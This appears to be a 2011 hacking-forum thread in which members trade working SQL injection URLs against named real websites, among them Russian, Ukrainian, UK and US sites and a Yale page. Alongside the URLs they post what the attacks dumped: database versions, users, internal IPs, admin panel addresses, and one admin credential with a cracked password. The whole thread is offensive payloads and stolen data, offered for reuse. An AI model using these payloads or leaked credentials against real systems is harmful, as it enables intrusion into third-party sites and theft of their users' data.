http://www.freehands.ru/game.php?set_phone_model=-148+union+select+null,null,group_concat(table_name +separator+0x3a)+from+information_schema.tables--

Unknown
15.03.2011, 12:20
asql said:
http://www.kinovdom.ru/catalog.php?catID=999999999999+union+select+concat _ws(0x3a3a3a,Login,Password)+from+logins+limit+0,1--
If anyone gets into the admin panel, please post the address (of the admin panel)


click

/showthread.php?p=2596026#post2596026 (https://antichat.live/showthread.php/p/2596026/)

AC//DC
15.03.2011, 15:15
http://www.aist-climat.ru/catalog/list/?id=-6349%20and%201=2%20union%20select%201,concat_ws(ch ar(58),@@version,user(),database()),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17+--

4.1.25-log cms5ru69_aist@localhost cms5ru69_aist

asql
15.03.2011, 17:22
http://www.texe.com/view.php?page=-34+union+select+1,group_concat(table_name+separato r+0x3a),3,4,5+from+information_schema.tables--

http://www.pandora.biz.ua/index.php?p=-35+union+select+1,2,group_concat(concat_ws(0x3a3a3 a,cat_id,root_cat,name_cat,descr,sh_descr,img,por) +separator+0x2a2a2a)+from+category--

Unknown
15.03.2011, 20:37
http://thomasdane.myzen.co.uk/artist.php?artist_id=-9%20union%20select%201,2,3,version(),5+--+

Compton
17.03.2011, 00:04
Code:
http://www.saittrojans.com/teams/schedule.html?sportID=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,gr oup_concat(table_name)+from+information_schema.tab les--

5.x branch

bloodAngel
18.03.2011, 02:07
Code:
http://www.mtosmt.org/mto-announce.php?id=-74+union+select+1,group_concat%28table_name%29,3,4 ,5+from+information_schema.tables--

5.1.33-log / mtoadmin_db


Code:
http://www.go-whippet.co.uk/announce.php?id=1%20or%281,2%29=%28select*from%28s elect%20name_const%28version%28%29,1%29,name_const %28version%28%29,1%29%29a%29

'5.0.77'

Unknown
18.03.2011, 11:19
http://www.leoalexander.co.uk/index.asp?id=11+and+1=0+union+all+select+1,2,3,con cat_ws%280x3a,version%28%29,database%28%29,user%28 %29%29,5,6,7+--+

Results are in the page title.

Managed to guess the users table (id, email, country). Couldn't guess the password field. The table holds data on 338 users.

asql
18.03.2011, 13:07
Here's a fun injection

http://kapitoshka.lg.ua/gallery.php?page=2&section=99999+union+select+version()--

guess where the version is!)

bloodAngel
18.03.2011, 14:44
asql said:
Here's a fun injection
http://kapitoshka.lg.ua/gallery.php?page=2&section=99999+union+select+version()--
guess where the version is!)


" href="pictures/gallery/5.0.51a-24+lenny5-log.jpg">"


Code:
http://www.globalalliancepr.org/event.php?id=-8+union+select+concat%28version%28%29,0x3a,databas e%28%29,0x3a,user%28%29%29

4.1.22:global_geral:global_geraladm@localhost

A_n_d_r_e_i
18.03.2011, 15:03
http://www.santaspen.net/content.php?id=-9+union+select+1,2,group_concat(0x3a3a,id_usr,emai l_usr,0x3a3a,password_usr),4,5+from+users_usr+--

Admin panel: http://www.santaspen.net/admin/index.php

Google PageRank (PR): 3

-----

http://www.flatsminsk.com/info.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,@@version,1 3+--

Admin panel: http://www.flatsminsk.com/admin/index.php

TIC: 30

-----

http://rakurs.rovno.ua/info.php?id=-182+union+select+1,2,3,4,5,6,@@version,8,9,10,11,1 2,13,14+--

TIC: 20

Google PageRank (PR): 2

-----

http://www.harrisinstitute.com/site/page.php?id=103+union+select+1,2,group_concat(user name,password,0x3a3a),4,5,6,7,8,9,10+from+tbl_user s+--

Admin panel: http://www.harrisinstitute.com/admin

Google PageRank (PR): 4

Admin:b75054364c277adfdca606e3300413a8:purples0177

FlaktW
19.03.2011, 13:04
http://teachers.yale.edu/curriculum/search/viewer.php?id=-initiative_09.01.01_u'+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),6,7,8,9,10,11,12+--+

5.0.77-log:res_teachers1:res_teachers@192.168.101.195:red hat-linux-gnu

Google PageRank (PR): 6

good.god
19.03.2011, 15:09
Code:
http://www.superav.com/fr/details_final.php?productID=-1+union+select+1,2,group_concat(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37

5.0.91-community:superav_MyMovie@localhost:superav_movie

output is in the title.

FlaktW
20.03.2011, 13:46
http://www.nypdangels.com/cop/cop.php?id=-159+and+(select*from(select+count(*)from(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d((select+concat_ws(0x3a,user(),@@version_compile_ os)+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64 ),floor(rand(0)*2)))z)+--+

5.0.91-log:nypdange_angels:nypdange_deespc@boscgi0102.eig box.net:unknown-linux-gnu

FlaktW
20.03.2011, 16:24
http://www.melges.com/?p=news&id=-1074+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os)+--+

5.0.77-log:409707_melges:409707_melges@172.17.3.93:redhat-linux-gnu

TIC: 10

Google PageRank (PR): 4

DJ4J
20.03.2011, 17:51
My first injection


Code:
http://www.magadangorod.ru/index.php?do=form&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat%28version% 28%29%29,10%20--

5.0.92-community-log

TIC 210

PR 5

DJ4J
20.03.2011, 21:08
Code:
http://www.korkinskoe.ru/index.php?page_id=-1+union+se lect+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,concat(username,0x3a,password),19 ,20,21,22+from+korkino_users

Output is in the title.

5.x branch.

Admin panel:

http://www.korkinskoe.ru/admin/

TIC 10